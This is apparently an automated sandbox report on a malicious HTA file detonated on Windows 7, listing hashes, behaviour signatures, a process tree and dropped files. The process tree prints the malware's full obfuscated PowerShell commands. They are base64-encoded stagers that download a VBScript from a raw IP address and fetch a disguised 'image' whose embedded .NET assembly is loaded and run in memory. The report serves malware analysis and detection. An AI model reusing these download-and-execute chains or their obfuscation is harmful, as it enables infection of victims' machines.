Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07-02-2025 13:34

General

  • Target

    specialgiftmakewithbestlovershegoodforbestthingsgood.hta

  • Size

    14KB

  • MD5

    e7a261ccc403f51d15952b9f81610ea6

  • SHA1

    c9166e929e81c09d6d1998b2e6a052546f18a440

  • SHA256

    70a1b6b8b689d6ed785e28002337fefc4933b61ae91fb12a023e01492081049e

  • SHA512

    e6b05d47dedc9601d500cfadfbe441d0ce4a89b81cd939d6f036469a5676cdac2481f233718e8e3e25f2ead7916e1cdabff9a4c25f65aacb0ca2a471d889daff

  • SSDEEP

    96:fCQGZ8MLI2eZ8MSI2bVqDO6Yjny1ixOZ8MgZ8MgfI2tZ8Mr:fCLNLfANSfRgPrAQN6NgffnNr

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\specialgiftmakewithbestlovershegoodforbestthingsgood.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2316
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C POwERsHELl.eXE -eX BYPAss -Nop -w 1 -C DEvICECRedEnTiAlDEPLoYMenT ; IeX($(iEx('[sysTem.TEXT.encOdiNG]'+[CHAR]0X3a+[cHar]0x3a+'uTF8.geTStrING([SysteM.cONVeRT]'+[ChaR]58+[cHAR]58+'frOmBaSe64sTRing('+[CHAr]34+'JGJyd1luaUVCWmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSRGVmaW5JVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxtT04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3ZBT09mWmQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcHlIdGhUUWRKLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNU1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcG51QXpSdkJ5WVcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJRY01mR0FYWkxrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSVRPbXFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYnJ3WW5pRUJaaTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE4NS4yOS4xMC4zMC82NzcvZ3JlYXRuaWNlaGluZ3NiZXR0ZXJ3aXRoZ29vZHRoaW5nc2Zvcm5ld3dheW9mYmVzdC5nSUYiLCIkRU5WOkFQUERBVEFcZ3JlYXRuaWNlaGluZ3NiZXR0ZXJ3aXRoZ29vZHRoaW5nc2Zvcm5ld3dheW9mYi52YnMiLDAsMCk7c1RhclQtc0xFRXAoMyk7SW52T0tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGdyZWF0bmljZWhpbmdzYmV0dGVyd2l0aGdvb2R0aGluZ3Nmb3JuZXd3YXlvZmIudmJzIg=='+[cHAr]0X22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POwERsHELl.eXE -eX BYPAss -Nop -w 1 -C DEvICECRedEnTiAlDEPLoYMenT ; IeX($(iEx('[sysTem.TEXT.encOdiNG]'+[CHAR]0X3a+[cHar]0x3a+'uTF8.geTStrING([SysteM.cONVeRT]'+[ChaR]58+[cHAR]58+'frOmBaSe64sTRing('+[CHAr]34+'JGJyd1luaUVCWmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSRGVmaW5JVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxtT04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3ZBT09mWmQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcHlIdGhUUWRKLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNU1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcG51QXpSdkJ5WVcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJRY01mR0FYWkxrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSVRPbXFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYnJ3WW5pRUJaaTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE4NS4yOS4xMC4zMC82NzcvZ3JlYXRuaWNlaGluZ3NiZXR0ZXJ3aXRoZ29vZHRoaW5nc2Zvcm5ld3dheW9mYmVzdC5nSUYiLCIkRU5WOkFQUERBVEFcZ3JlYXRuaWNlaGluZ3NiZXR0ZXJ3aXRoZ29vZHRoaW5nc2Zvcm5ld3dheW9mYi52YnMiLDAsMCk7c1RhclQtc0xFRXAoMyk7SW52T0tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGdyZWF0bmljZWhpbmdzYmV0dGVyd2l0aGdvb2R0aGluZ3Nmb3JuZXd3YXlvZmIudmJzIg=='+[cHAr]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:804
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mple_adb.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2684
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD73D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD73C.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2784
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\greatnicehingsbetterwithgoodthingsfornewwayofb.vbs"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2596
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AdABzAGUAYgBmAG8AeQBhAHcAdwBlAG4AcgBvAGYAcwBnAG4AaQBoAHQAZABvAG8AZwBoAHQAaQB3AHIAZQB0AHQAZQBiAHMAZwBuAGkAaABlAGMAaQBuAHQAYQBlAHIAZwAvADcANwA2AC8AMAAzAC4AMAAxAC4AOQAyAC4ANQA4ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMQAwADAAOAAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AagB6AHcARQBIAEEASgBQAHgASwBMAEwAegBnAFoARgBoAFkAVgBBAFEATQBBAE8ARQBOAEgAMQBRAHcAdgA4AGEAcwBFAG4ANAAzAHIATgBIADgAdwBPAGcAcQB4AGcATABOADUAeQBnAGcARQBLAGgAOQBFAGcAQQA5ADcARwBnAGMATABYAFEAZwAmAHAAawBfAHYAaQBkAD0AMwA0ADIAOAAwADMAZAAxAGMAYwA0AGUAMwBiADgAMAAxADcAMwA4ADgAOAAyADQAOQA1AGIANQBmAGUAOQBkACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2628

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESD73D.tmp

    Filesize

    1KB

    MD5

    49e8920fb9af20b96850947cb68cac6a

    SHA1

    02674751fc513ec02fb38793539c5cb1093eb6f7

    SHA256

    34d3bf7a65d09a85e7b16123ade08572fd4f1888b940c3104877175f2f544305

    SHA512

    337cc050a98db2d58ed02653bd8b7b4f88bdc927de9ae2ef87933decd984e8d2a6925d0ac82e5c2231baa4d1e1127cc0a85deb8855ae384a8adef6db00c4ae9a

  • C:\Users\Admin\AppData\Local\Temp\mple_adb.dll

    Filesize

    3KB

    MD5

    b53305b0a90b53d75f94011ac007a19d

    SHA1

    5d71ae5ab40b896a80e28c1932b277fbe79d0ef9

    SHA256

    2c63eb6f3a0cca23b9df8f191f1a64deed27a71f75e2edd5c2e1622519b33f19

    SHA512

    e2e6a529d7596e457aa5e942cfb20b3151d552c88e92bc5f66d98e385a0162803059785b10b980ee11c2c451abdfac877d57bb9848bac7936dc247d62cf13cd2

  • C:\Users\Admin\AppData\Local\Temp\mple_adb.pdb

    Filesize

    7KB

    MD5

    84144a1c18ed3dc4474854549f185217

    SHA1

    5f51baa693e8b33e2f89e261532f2c1c48b092a4

    SHA256

    bee4a597bd40ae4ff9149c6f984bcb2180f7ff3c970f0123afeb9d8f554d10a4

    SHA512

    7da3faee37b5c733bf8d374b55792b3fc2507deb3a343fb9a0ef1c94f39d2d57694228e208b20bbee87c4d24c2f89a77d2b982e09ed8d254efed19d19d3511f5

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    b7efba7ed4bc27e5577d338e59262daa

    SHA1

    7a3fd21220211b374c584228015362e31147da9f

    SHA256

    6e3026fc041fce584ae18798d38cfacd7d61cb12dd557bd8ad21c9ad7774365d

    SHA512

    beb85ae8510c4547d91ebb757cbbdde7b287d59b9290acc82ffaa57590b4eeca2f4c4b8f0c45d80c1d73d5b8fa9139a9151cbdd5eaebe73a09e1956d9a475880

  • C:\Users\Admin\AppData\Roaming\greatnicehingsbetterwithgoodthingsfornewwayofb.vbs

    Filesize

    195KB

    MD5

    22149f3f69f6b23ef1368f1ca5ee8c36

    SHA1

    532b2e6bea80e33c5c6ce6a42a6277f061ca897e

    SHA256

    3dc045b58a5e12d588a87600428b8f3c051bf4a3875aafd19f4c1798a7117132

    SHA512

    817fbaff51ae892aaf9267e0166bdf7384aa7a8f12df8efe601cb7e9f71ecf8c2d26e31ddfd5943a7383d0bf6f03b7227e6b55c639e2b26b2f8394ca8c49b72a

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCD73C.tmp

    Filesize

    652B

    MD5

    1989ca7238016390f2fdffb7b00829ca

    SHA1

    74043c7e1a6b84637c06592e4ad901197d5d1889

    SHA256

    323fb68af763b73b199f8558a4fb77f00ed82c51c0c2ba635ed845f28a82a8b7

    SHA512

    c3a22304072e420b120a906db3c1f0d460dcc2df84bbe5eb47d4e04747e6fc9c20984abd083fe692ac175aa8428e520fbaa91c4ed0d09a39a12fee983b05c1a2

  • \??\c:\Users\Admin\AppData\Local\Temp\mple_adb.0.cs

    Filesize

    488B

    MD5

    2c00e5ba50babb3432415a036131314a

    SHA1

    f3ed28f53d55ce8cd28a07f7e1cfeb6ce0df56b0

    SHA256

    9a198855c0cf764ca07f17c267574eabcbce69aa0378276eb3790d99228a6195

    SHA512

    c1f6139dbcbd160af0c2d26ee897a6ea1d8d0cf42544c8c2dc5efffcb021461a69eeb0f18decbbc36f4b203bc5f7dae275c3fa6118b642184a1b7a06cbb16c54

  • \??\c:\Users\Admin\AppData\Local\Temp\mple_adb.cmdline

    Filesize

    309B

    MD5

    8beea00114a63e60486f4fee9457aed6

    SHA1

    7445907ab91e4fc10930f44b77e1f26a8f95c716

    SHA256

    537fe1eee97146d56efdf9c2964978418812cfba9d1d953f07ba42a1040a4239

    SHA512

    f17c0ac6272a4972be4a05a60dd08347c292f81430ec1f307019ddb64827a008c52957889c5848383846508d73ccaa7d728c07aad8ab6de47233a053c5f29ca0